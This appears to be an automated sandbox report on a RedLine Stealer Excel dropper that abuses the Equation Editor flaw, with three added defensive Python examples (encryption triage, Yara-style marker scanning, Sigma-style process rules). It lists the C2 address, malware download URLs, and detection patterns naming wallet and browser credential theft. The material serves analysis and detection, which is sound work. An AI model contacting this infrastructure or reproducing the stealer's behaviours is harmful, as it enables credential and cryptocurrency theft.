Automated Malware Analysis Report for POAT2076452.xlsx
ID: 576509
Sample Name: POAT2076452.xlsx
Cookbook: defaultwindowsofficecookbook.jbs
Time: 15:29:06
Date: 22/02/2022
Version: 34.0.0 Boulder Opal
Table of Contents

Windows Analysis Report POAT2076452.xlsx
  Overview
    General Information
    Detection
    Signatures
    Classification
  Process Tree
  Malware Configuration
    Threatname: RedLine
  Yara Signatures
    PCAP (Network Traffic)
    Memory Dumps
    Unpacked PEs
  Sigma Signatures
    Exploits
    System Summary
  Joe Sandbox Signatures
    AV Detection
    Exploits
    Networking
    System Summary
    Data Obfuscation
    Boot Survival
    Hooking and other Techniques for Hiding and Protection
    Malware Analysis System Evasion
    HIPS / PFW / Operating System Protection Evasion
    Stealing of Sensitive Information
    Remote Access Functionality
  Mitre Att&ck Matrix
  Behavior Graph
  Screenshots
    Thumbnails
  Antivirus, Machine Learning and Genetic Malware Detection
    Initial Sample
    Dropped Files
    Unpacked PE Files
    Domains
    URLs
  Domains and IPs
    Contacted Domains
    Contacted URLs
    URLs from Memory and Binaries
    World Map of Contacted IPs
      Public IPs
  General Information
  Warnings
  Simulations
    Behavior and APIs
  Joe Sandbox View / Context
    IPs
    Domains
    ASNs
    JA3 Fingerprints
    Dropped Files
  Created / dropped Files
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34F90E45.png
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FE9EF17.png
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51123782.png
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\540F5A54.png
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\597D09DF.png
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D634E2C.png
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5A50888.emf
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF292561.png
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEDCE7D6.jpeg
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBC9D9B.png
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E382C2E0.jpeg
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F0748BEE.png
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9EE9.png
    C:\Users\user\AppData\Local\Temp\tmp3E26.tmp
    C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp
    C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp
    C:\Users\user\AppData\Local\Temp\tmp533A.tmp
Copyright Joe Security LLC 2022 Page 2 of 65
    C:\Users\user\AppData\Local\Temp\tmp6222.tmp
    C:\Users\user\AppData\Local\Temp\tmp62EE.tmp
    C:\Users\user\AppData\Local\Temp\tmp6417.tmp
    C:\Users\user\AppData\Local\Temp\tmp64E3.tmp
    C:\Users\user\AppData\Local\Temp\tmp66A8.tmp
    C:\Users\user\AppData\Local\Temp\tmp67A3.tmp
    C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp
    C:\Users\user\AppData\Local\Temp\tmp6C85.tmp
    C:\Users\user\AppData\Local\Temp\tmp7108.tmp
    C:\Users\user\AppData\Local\Temp\tmp71C5.tmp
    C:\Users\user\AppData\Local\Temp\tmp72BF.tmp
    C:\Users\user\AppData\Local\Temp\tmp738B.tmp
    C:\Users\user\AppData\Local\Temp\tmp7486.tmp
    C:\Users\user\AppData\Local\Temp\tmp7551.tmp
    C:\Users\user\AppData\Local\Temp\tmp764C.tmp
    C:\Users\user\AppData\Local\Temp\tmp7718.tmp
    C:\Users\user\AppData\Local\Temp\tmp7841.tmp
    C:\Users\user\AppData\Local\Temp\tmp790D.tmp
    C:\Users\user\AppData\Local\Temp\tmp79D9.tmp
    C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp
    C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp
    C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp
    C:\Users\user\AppData\Local\Temp\~DF179744FD61C7CF51.TMP
    C:\Users\user\AppData\Local\Temp\~DF26FE9B5EC11612F4.TMP
    C:\Users\user\AppData\Local\Temp\~DFAB0D2DA66A547388.TMP
    C:\Users\user\AppData\Local\Temp\~DFEA839BB433B75553.TMP
    C:\Users\user\Desktop\~$POAT2076452.xlsx
    C:\Users\Public\vbc.exe
  Static File Info
    General
    File Icon
  Network Behavior
    Network Port Distribution
    TCP Packets
    UDP Packets
    DNS Queries
    DNS Answers
    HTTP Request Dependency Graph
    HTTP Packets
    HTTPS Proxied Packets
  Statistics
    Behavior
  System Behavior
    Analysis Process: EXCEL.EXE PID: 2580, Parent PID: 596
      General
      File Activities
      Registry Activities
        Key Created
        Key Value Created
    Analysis Process: EQNEDT32.EXE PID: 2664, Parent PID: 596
      General
      File Activities
      Registry Activities
        Key Created
    Analysis Process: vbc.exe PID: 1828, Parent PID: 2664
      General
      File Activities
        File Read
      Registry Activities
        Key Created
        Key Value Created
    Analysis Process: vbc.exe PID: 2844, Parent PID: 1828
      General
      File Activities
        File Created
        File Deleted
        File Written
        File Read
  Disassembly
Windows Analysis Report POAT2076452.xlsx

Overview

General Information
Sample Name: POAT2076452.xlsx
Analysis ID: 576509
MD5: e9ffc84abf7ed6f…
SHA1: d636a41a99a022…
SHA256: 03d548395841b2…
Tags: Formbook, VelvetSweatshop, xlsx

Detection
RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
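The VelvetSweatshop tag refers to Excel's built-in default password: a workbook encrypted with it is decrypted by Excel without any prompt, so the document still reaches the Equation Editor exploit path while it looks like an opaque encrypted blob to scanners that expect a ZIP-based .xlsx (the ReversingLabs label Document-OLE.Exploit.CVE-2017-11882 further down is consistent with an OLE container). The triage check below is an added example and not part of the Joe Sandbox report: it tells a ZIP-based .xlsx from an OLE compound file carrying the EncryptionInfo and EncryptedPackage streams that mark an encrypted OOXML document. The parsing follows the [MS-CFB] layout; build_cfb() is a constructed fixture standing in for the real sample, which is not available here, and the function names are this example's own.

```python
"""Triage check behind the VelvetSweatshop tag: is this .xlsx a plain ZIP
container, or an OLE compound file (CFB) whose EncryptionInfo/EncryptedPackage
streams mark an encrypted OOXML document?
Added example, not part of the Joe Sandbox report. The on-disk layout follows
[MS-CFB]; build_cfb() constructs a toy container because the real sample is
not available here."""
import struct

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
ENDOFCHAIN = 0xFFFFFFFE
FATSECT = 0xFFFFFFFD
FREESECT = 0xFFFFFFFF
MAXREGSECT = 0xFFFFFFFA   # largest regular sector number


def cfb_entry_names(data: bytes) -> list:
    """Walk the directory chain of a CFB file and return its entry names.
    Only the 109 DIFAT slots in the header are read; a file with more FAT
    sectors than that (hundreds of MB) would also need the DIFAT chain."""
    if not data.startswith(CFB_MAGIC):
        raise ValueError("not an OLE compound file")
    sector_size = 1 << struct.unpack_from("<H", data, 30)[0]
    first_dir = struct.unpack_from("<I", data, 48)[0]
    difat = struct.unpack_from("<109I", data, 76)

    def sector(n: int) -> bytes:  # sector 0 starts right after the 512-byte header
        return data[512 + n * sector_size: 512 + (n + 1) * sector_size]

    fat = []
    for s in difat:
        if s > MAXREGSECT:        # FREESECT padding ends the DIFAT array
            break
        fat.extend(struct.unpack(f"<{sector_size // 4}I", sector(s)))

    names, sect, seen = [], first_dir, set()
    while sect <= MAXREGSECT and sect < len(fat) and sect not in seen:  # ENDOFCHAIN stops the walk
        seen.add(sect)
        chunk = sector(sect)
        for off in range(0, sector_size, 128):     # 128-byte directory entries
            name_len = struct.unpack_from("<H", chunk, off + 64)[0]
            if name_len >= 2:  # length counts the UTF-16 NUL terminator; 0 marks an unused slot
                names.append(chunk[off:off + name_len - 2].decode("utf-16-le"))
        sect = fat[sect]
    return names


def is_encrypted_ooxml(data: bytes) -> bool:
    """True for an encrypted .xlsx/.docx: a CFB container carrying the
    EncryptionInfo and EncryptedPackage streams. A normal OOXML file starts
    with the ZIP signature 'PK' and is never a CFB file."""
    if not data.startswith(CFB_MAGIC):
        return False
    return {"EncryptionInfo", "EncryptedPackage"} <= set(cfb_entry_names(data))


def build_cfb(stream_names) -> bytes:
    """Constructed test fixture: a minimal CFB with 512-byte sectors,
    sector 0 = FAT, sector 1 = directory (root entry plus up to 3 streams)."""
    hdr = bytearray(512)
    hdr[:8] = CFB_MAGIC
    struct.pack_into("<HHHH", hdr, 24, 0x3E, 3, 0xFFFE, 9)   # minor/major version, byte order, 512-byte sectors
    struct.pack_into("<H", hdr, 32, 6)                       # mini sector shift
    struct.pack_into("<I", hdr, 44, 1)                       # one FAT sector
    struct.pack_into("<I", hdr, 48, 1)                       # first directory sector
    struct.pack_into("<I", hdr, 56, 0x1000)                  # mini stream cutoff
    struct.pack_into("<II", hdr, 60, ENDOFCHAIN, 0)          # no mini FAT
    struct.pack_into("<II", hdr, 68, ENDOFCHAIN, 0)          # no extra DIFAT sectors
    struct.pack_into("<109I", hdr, 76, 0, *([FREESECT] * 108))
    fat = struct.pack("<128I", FATSECT, ENDOFCHAIN, *([FREESECT] * 126))
    directory = bytearray(512)
    for idx, name in enumerate(["Root Entry", *stream_names]):
        wide = name.encode("utf-16-le") + b"\x00\x00"
        directory[idx * 128: idx * 128 + len(wide)] = wide
        # name length at +64, object type at +66 (5 = root storage, 2 = stream)
        struct.pack_into("<HB", directory, idx * 128 + 64, len(wide), 5 if idx == 0 else 2)
    return bytes(hdr) + fat + bytes(directory)
```

A positive result only says the package is encrypted; whether the password is VelvetSweatshop or something user-supplied is decided by actually decrypting, which is what Excel (and the sandbox) does before the Equation Editor object ever comes into play.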
Signatures
Yara detected RedLine Stealer
Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Execution from Suspicious Folder
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Office equation editor drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Searches for Windows Mail specific files
Drops PE files to the user root directory
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (nam…
Yara signature match
May sleep (evasive loops) to hinder…
Checks if Antivirus/Antispyware/Fire…
Detected potential crypto function
Stores large binary data to the regis…
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in co…
Potential document exploit detected…
HTTP GET or POST without a user …
IP address seen in connection with …
Downloads executable code via HTT…
Uses insecure TLS / SSL version fo…
Contains long sleeps (>= 3 min)
Enables debug privileges
Classification
Radar chart over the categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader and Miner, each scored on a clean / suspicious / malicious scale (chart not reproduced).
Process Tree
System is w7x64
EXCEL.EXE (PID: 2580 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
EQNEDT32.EXE (PID: 2664 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  vbc.exe (PID: 1828 cmdline: "C:\Users\Public\vbc.exe" MD5: 980EC4304344F277D722024ADE08CD01)
    vbc.exe (PID: 2844 cmdline: C:\Users\Public\vbc.exe MD5: 980EC4304344F277D722024ADE08CD01)
cleanup

Malware Configuration
Threatname: RedLine
{
    "C2 url": [
        "179.43.175.99:21900"
    ],
    "Bot Id": "cheat"
}

Yara Signatures
PCAP (Network Traffic)
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |
Memory Dumps
Source | Rule | Description | Author | Strings
00000004.00000002.501429999.0000000003319000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000004.00000002.501429999.0000000003319000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
(5 of 16 entries shown)

Unpacked PEs
Source | Rule | Description | Author | Strings
5.0.vbc.exe.400000.8.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
5.0.vbc.exe.400000.8.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
5.0.vbc.exe.400000.8.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen | 0x1048a:$u7: RunPE; 0x13b41:$u8: DownloadAndEx; 0x9130:$pat14: , CommandLine:; 0x13079:$v2_1: ListOfProcesses; 0x1068b:$v2_2: get_ScanVPN; 0x1072e:$v2_2: get_ScanFTP; 0x1141e:$v2_2: get_ScanDiscord; 0x1240c:$v2_2: get_ScanSteam; 0x12428:$v2_2: get_ScanTelegram; 0x124ce:$v2_2: get_ScanScreen; 0x13216:$v2_2: get_ScanChromeBrowsersPaths; 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths; 0x13509:$v2_2: get_ScanBrowsers; 0x135ca:$v2_2: get_ScannedWallets; 0x135f0:$v2_2: get_ScanWallets; 0x13610:$v2_3: GetArguments; 0x11cd9:$v2_4: VerifyUpdate; 0x165ea:$v2_4: VerifyUpdate; 0x139ca:$v2_5: VerifyScanRequest; 0x130c6:$v2_6: GetUpdates; 0x165cb:$v2_6: GetUpdates
5.0.vbc.exe.400000.12.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
5.0.vbc.exe.400000.12.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
(5 of 23 entries shown)
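The Strings column of the ditekSHen match gives the offset inside the unpacked vbc.exe image at which each marker string was found, and the single identifier $v2_2 hits a whole family of get_Scan* method names. The scanner below is an added example, not the rule itself: it reproduces that offset:identifier:string output for a constructed blob, looking for every marker in both ASCII and UTF-16LE, which is what a Yara `ascii wide` string does (.NET keeps metadata names such as method names in the UTF-8 #Strings heap but user strings in the UTF-16LE #US heap, so a stealer's method names and its format strings land in different encodings). The regex used for $v2_2, the SAMPLE_BLOB contents and the four-distinct-$v2_* threshold in looks_like_redline() are assumptions of this example, not the real rule's condition.

```python
"""Reproduce the Strings column of the ditekSHen match: locate RedLine marker
strings inside a (constructed) .NET payload image and report
offset:identifier:string, searching each marker in ASCII and in UTF-16LE the
way a Yara 'ascii wide' string does. Added example; the markers are the ones
listed in the report, while the $v2_2 regex and the 'four distinct $v2_*'
threshold are assumptions, not the real rule's condition."""
import re
from typing import List, Tuple

MARKERS = {
    "$u7": b"RunPE",
    "$u8": b"DownloadAndEx",
    "$pat14": b", CommandLine:",
    "$v2_1": b"ListOfProcesses",
    "$v2_2": b"get_Scan",          # prefix: the report shows get_ScanVPN, get_ScanBrowsers, ...
    "$v2_3": b"GetArguments",
    "$v2_4": b"VerifyUpdate",
    "$v2_5": b"VerifyScanRequest",
    "$v2_6": b"GetUpdates",
}
PREFIX_MARKERS = {"$v2_2"}   # assumed: prefix followed by a run of identifier characters

IDENT_ASCII = rb"[A-Za-z0-9_]+"
IDENT_WIDE = rb"(?:[A-Za-z0-9_]\x00)+"


def _wide(literal: bytes) -> bytes:
    """UTF-16LE form of an ASCII literal: every byte followed by a NUL."""
    return b"".join(bytes((c, 0)) for c in literal)


def _patterns(ident: str, literal: bytes):
    """Compiled (ascii, wide) regexes for one marker."""
    tail_a, tail_w = (IDENT_ASCII, IDENT_WIDE) if ident in PREFIX_MARKERS else (b"", b"")
    return (re.compile(re.escape(literal) + tail_a),
            re.compile(re.escape(_wide(literal)) + tail_w))


Hit = Tuple[int, str, str]   # (offset, identifier, matched text)


def scan(data: bytes) -> List[Hit]:
    """All marker hits in the blob, ascending by offset."""
    hits: List[Hit] = []
    for ident, literal in MARKERS.items():
        ascii_re, wide_re = _patterns(ident, literal)
        hits += [(m.start(), ident, m.group().decode("ascii")) for m in ascii_re.finditer(data)]
        hits += [(m.start(), ident, m.group().decode("utf-16-le")) for m in wide_re.finditer(data)]
    return sorted(hits)


def format_hits(hits: List[Hit]) -> List[str]:
    """Same shape as the report's Strings column, e.g. 0x1048a:$u7: RunPE"""
    return [f"0x{off:x}:{ident}: {text}" for off, ident, text in hits]


def looks_like_redline(hits: List[Hit], min_distinct_v2: int = 4) -> bool:
    """Assumed condition: enough distinct $v2_* identifiers present. The real
    rule's condition is not reproduced in the report."""
    return len({ident for _, ident, _ in hits if ident.startswith("$v2_")}) >= min_distinct_v2


# Constructed blob standing in for an unpacked image: #Strings-style UTF-8
# names first, then two #US-style UTF-16LE user strings.
SAMPLE_BLOB = (
    b"\x00" * 0x40
    + b"ListOfProcesses\x00get_ScanVPN\x00get_ScanBrowsers\x00GetArguments\x00VerifyUpdate\x00"
    + b"\x00" * 8
    + "RunPE".encode("utf-16-le") + b"\x00" * 16
    + "GetUpdates".encode("utf-16-le")
)

if __name__ == "__main__":
    found = scan(SAMPLE_BLOB)
    print("\n".join(format_hits(found)))
    print("RedLine markers present:", looks_like_redline(found))
```

Scanning the wide form is what keeps RunPE and GetUpdates visible in the constructed blob even though neither appears as a plain ASCII run; a rule that only declares `ascii` strings would miss exactly the user strings a stealer formats at runtime.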
Sigma Signatures
Exploits
System Summary
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Execution from Suspicious Folder
Joe Sandbox Signatures
AV Detection
Exploits
Networking
System Summary
Data Obfuscation
Boot Survival
Hooking and other Techniques for Hiding and Protection
Malware Analysis System Evasion
HIPS / PFW / Operating System Protection Evasion
Stealing of Sensitive Information
Remote Access Functionality
Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Machine Learning detection for dropped file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Uses known network protocols on non-standard ports
Malicious sample detected (through community Yara rule)
Office equation editor drops PE file
.NET source code contains potential unpacker
Drops PE files to the user root directory
Uses known network protocols on non-standard ports
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Injects a PE file into a foreign processes
Yara detected RedLine Stealer
Tries to steal Crypto Currency Wallets
Searches for Windows Mail specific files
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected RedLine Stealer
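The Sigma and Joe Sandbox signatures above describe one chain: the Equation Editor (EQNEDT32.EXE) fetches and drops a PE, launches it from C:\Users\Public, and the dropped vbc.exe then talks to 179.43.175.99:21900. The same chain is visible in endpoint telemetry. The following is an added example, not the Sigma rules themselves and not code from the report: it paraphrases the five Sigma titles as conditions over Sysmon-style records (EventID 1/3/11 with Image, ParentImage, TargetFilename and DestinationIp fields, a layout assumed here) and runs them over constructed events modelled on the report's process tree and contacted IPs.

```python
"""Detection logic for the EQNEDT32.EXE chain flagged in the report, run over
a few constructed Sysmon-style events. Added example: the conditions
paraphrase the Sigma rule titles in the report (they are not the Sigma rules),
and the records below are constructed to mirror the report's process tree."""
from dataclasses import dataclass
from typing import Callable, Dict, List

Event = Dict[str, object]

# Sysmon EventIDs used by the rules
PROCESS_CREATE, NETWORK_CONNECT, FILE_CREATE = 1, 3, 11

# Locations a user-writable dropper tends to land in; compared case-insensitively
SUSPICIOUS_DIRS = ("c:\\users\\public\\", "\\appdata\\local\\temp\\", "c:\\windows\\temp\\")


def _image_is(ev: Event, field: str, exe: str) -> bool:
    """True when the given path field names the executable `exe` (basename match)."""
    return str(ev.get(field, "")).lower().endswith("\\" + exe)


def _in_suspicious_dir(path: object) -> bool:
    low = str(path).lower()
    return any(d in low for d in SUSPICIOUS_DIRS)


@dataclass(frozen=True)
class Rule:
    title: str
    matches: Callable[[Event], bool]


RULES: List[Rule] = [
    Rule("EQNEDT32.EXE connecting to internet",
         lambda e: e["EventID"] == NETWORK_CONNECT and _image_is(e, "Image", "eqnedt32.exe")),
    Rule("File Dropped By EQNEDT32EXE",
         lambda e: e["EventID"] == FILE_CREATE and _image_is(e, "Image", "eqnedt32.exe")),
    Rule("Droppers Exploiting CVE-2017-11882",
         lambda e: e["EventID"] == PROCESS_CREATE and _image_is(e, "ParentImage", "eqnedt32.exe")),
    Rule("Execution from Suspicious Folder",
         lambda e: e["EventID"] == PROCESS_CREATE and _in_suspicious_dir(e["Image"])),
    Rule("Suspicious Program Location with Network Connections",
         lambda e: e["EventID"] == NETWORK_CONNECT and _in_suspicious_dir(e["Image"])),
]


def evaluate(events: List[Event]) -> Dict[str, List[int]]:
    """Map each rule title to the indexes of the events that triggered it;
    rules with no hits are omitted."""
    hits: Dict[str, List[int]] = {}
    for idx, ev in enumerate(events):
        for rule in RULES:
            if rule.matches(ev):
                hits.setdefault(rule.title, []).append(idx)
    return hits


EQNEDT32 = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
VBC = r"C:\Users\Public\vbc.exe"

# Constructed records modelled on the report (paths, PIDs and peers are the
# report's; the event layout is Sysmon's, not the sandbox's own format).
SAMPLE_EVENTS: List[Event] = [
    {"EventID": FILE_CREATE, "Image": EQNEDT32, "ProcessId": 2664, "TargetFilename": VBC},
    {"EventID": NETWORK_CONNECT, "Image": EQNEDT32, "ProcessId": 2664,
     "DestinationIp": "103.171.0.134", "DestinationPort": 80},
    {"EventID": PROCESS_CREATE, "Image": VBC, "ProcessId": 1828,
     "ParentImage": EQNEDT32, "ParentProcessId": 2664},
    {"EventID": PROCESS_CREATE, "Image": VBC, "ProcessId": 2844,
     "ParentImage": VBC, "ParentProcessId": 1828},
    {"EventID": NETWORK_CONNECT, "Image": VBC, "ProcessId": 2844,
     "DestinationIp": "179.43.175.99", "DestinationPort": 21900},
    # benign control record, should match nothing
    {"EventID": PROCESS_CREATE, "Image": r"C:\Windows\System32\notepad.exe", "ProcessId": 3100,
     "ParentImage": r"C:\Windows\explorer.exe", "ParentProcessId": 1500},
]

if __name__ == "__main__":
    for title, idxs in evaluate(SAMPLE_EVENTS).items():
        print(f"{title}: events {idxs}")
```

Two of the five conditions (EQNEDT32.EXE making any network connection, or creating any file) need no knowledge of this particular sample, which is why they fire on the first stage before the RedLine payload ever runs; the folder-based rules are noisier on their own and are best read together with the parent-process rule.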
Mitre Att&ck Matrix
Techniques matched, grouped by tactic (numbers as shown in the original matrix cells; Initial Access, Persistence, Lateral Movement, Exfiltration, Network Eff ects, Remote Service Effects and Impact had no matches and are omitted):
Execution: Windows Management Instrumentation (2 2 1); Exploitation for Client Execution (1 3)
Privilege Escalation: Process Injection (1 1 1); Extra Window Memory Injection (1)
Defense Evasion: Masquerading (1 1 1); Modify Registry (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (2 3 1); Process Injection (1 1 1); Software Packing (1); Extra Window Memory Injection (1)
Credential Access: OS Credential Dumping (1)
Discovery: Query Registry (1); Security Software Discovery (2 3); Process Discovery (1); Virtualization/Sandbox Evasion (2 3 1); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (1 1 4)
Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (3)
Command and Control: Encrypted Channel (1 1); Non-Standard Port (1 1); Ingress Tool Transfer (1 2); Non-Application Layer Protocol (3); Application Layer Protocol (2 4)

Behavior Graph
ID: 576509
Sample: POAT2076452.xlsx
Startdate: 22/02/2022
Architecture: WINDOWS
Score: 100
Graph-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 14 other signatures
Nodes recovered from the graph (the drawing itself is not reproduced):
Processes started: EXCEL.EXE; EQNEDT32.EXE; vbc.exe; vbc.exe
Dropped files: C:\Users\user\AppData\Local\...\.win32[1].exe (PE32); C:\Users\Public\vbc.exe (PE32); C:\Users\user\Desktop\~$POAT2076452.xlsx (data)
Network: 103.171.0.134, ports 49165, 80 (AARNET-AS-APAustralianAcademicandResearchNetworkAARNe, country unknown); olypath.com 178.18.193.160, ports 49167, 80 (VARGONENTR, Turkey); cdn.discordapp.com 162.159.130.233, ports 443, 49166 (CLOUDFLARENETUS, United States); 179.43.175.99, ports 21900, 49168, 49170 (PLI-ASCH, Panama); api.ip.sb
Signatures shown on the graph: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Injects a PE file into a foreign processes; Searches for Windows Mail specific files; Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets
Screenshots
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
POAT2076452.xlsx | 35% | ReversingLabs | Document-OLE.Exploit.CVE-2017-11882

Dropped Files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe | 7% | ReversingLabs |
C:\Users\Public\vbc.exe | 7% | ReversingLabs |

Unpacked PE Files
Source | Detection | Scanner | Label
5.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1144480
5.0.vbc.exe.400000.16.unpack | 100% | Avira | HEUR/AGEN.1144480
5.0.vbc.exe.400000.10.unpack | 100% | Avira | HEUR/AGEN.1144480
5.0.vbc.exe.400000.8.unpack | 100% | Avira | HEUR/AGEN.1144480
5.0.vbc.exe.400000.12.unpack | 100% | Avira | HEUR/AGEN.1144480
5.0.vbc.exe.400000.14.unpack | 100% | Avira | HEUR/AGEN.1144480
Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label
ns.adobe.c/s | 0% | Avira URL Cloud | safe
ocsp.entrust.net03 | 0% | URL Reputation | safe
tempuri.org/Endpoint/EnvironmentSettings | 0% | URL Reputation | safe
179.43.175.99:21900x0 | 0% | Avira URL Cloud | safe
https://api.ip.sb/geoip | 0% | URL Reputation | safe
crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
tempuri.org/ | 0% | URL Reputation | safe
www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
103.171.0.134/_spaceX2__/.win32.exe | 100% | Avira URL Cloud | malware
tempuri.org/Endpoint/VerifyUpdateResponse | 0% | URL Reputation | safe
tempuri.org/Endpoint/CheckConnectprH= | 100% | Avira URL Cloud | phishing
tempuri.org/Endpoint/SetEnvironment | 0% | URL Reputation | safe
tempuri.org/Endpoint/SetEnvironmentResponse | 0% | URL Reputation | safe
tempuri.org/Endpoint/GetUpdates | 0% | URL Reputation | safe
https://api.ipify.orgcookies//settinString.Removeg | 0% | URL Reputation | safe
179.43.175.99:21900 | 0% | Avira URL Cloud | safe
tempuri.org/Endpoint/VerifyUpdate | 0% | URL Reputation | safe
tempuri.org/Endpoint/SetEnvironmenteMH= | 100% | Avira URL Cloud | phishing
ocsp.entrust.net0D | 0% | URL Reputation | safe
tempuri.org/Endpoint/CheckConnectResponse | 0% | URL Reputation | safe
schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | URL Reputation | safe
https://api.ip.sbP | 0% | Avira URL Cloud | safe
crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
tempuri.org/Endpoint/GetUpdatesResponse | 0% | URL Reputation | safe
tempuri.org/Endpoint/EnvironmentSettingsResponse | 0% | URL Reputation | safe
olypath.com/RLBIl.exe | 100% | Avira URL Cloud | malware
ns.adobe. | 0% | URL Reputation | safe
https://api.ipify. | 0% | Avira URL Cloud | safe
olypath.comP | 0% | Avira URL Cloud | safe
tempuri.org/h | 100% | Avira URL Cloud | phishing
https://api.ipify.orgcoo | 0% | Avira URL Cloud | safe
179.43.175.99:21900/ | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
cdn.discordapp.com | 162.159.130.233 | true | false | | high
olypath.com | 178.18.193.160 | true | false | | unknown
api.ip.sb | unknown | unknown | true | | unknown

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
